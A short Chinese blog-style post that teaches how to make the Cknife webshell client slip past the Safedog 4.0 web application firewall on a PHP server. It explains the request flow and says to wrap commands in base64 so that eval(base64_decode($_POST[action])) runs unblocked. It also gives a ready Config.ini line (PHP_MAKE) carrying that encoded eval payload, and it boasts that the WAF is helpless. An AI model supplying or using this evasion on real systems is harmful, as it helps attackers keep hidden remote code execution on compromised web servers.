昨天跟小伙伴们分享了绕过安全狗上传,今天给大家分享一个过狗菜刀实现,
系统:Windows 2003
WAF:Safe dog 4.0
PHP: 5.4
菜刀:Cknife
PHP中的 eval 不是一个函数,而是一个表达式,并不能当做可变函数使用
先说一下C刀的请求过程(设置好代理)
在第一次一句话木马通过菜刀与服务器建立连接时:
这里的eval是直接被WAF拦截的。为了不让它拦截,我们一样同第二个参数传输相同的base64密文。
贴出免杀一句话:
可见完全是免杀的。
过程就是菜刀发送加密的数据包过来以后,再经过base64_decode解密,解密之后将eval(base64_decode($_POST[action]));传入给$_当做php代码执行,而传入过来的参数中也接收后方的action参数,并且当做PHP代码执行
整个过程WAF都束手无策!
附上加密后的数据包:
修改过程:
找到目录下的Config.ini中的PHP_MAKE,改为:PHP_MAKE=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFthY3Rpb25dKSk\=
这样就完全免杀了。
贴出修改前和修改后的效果
修改后
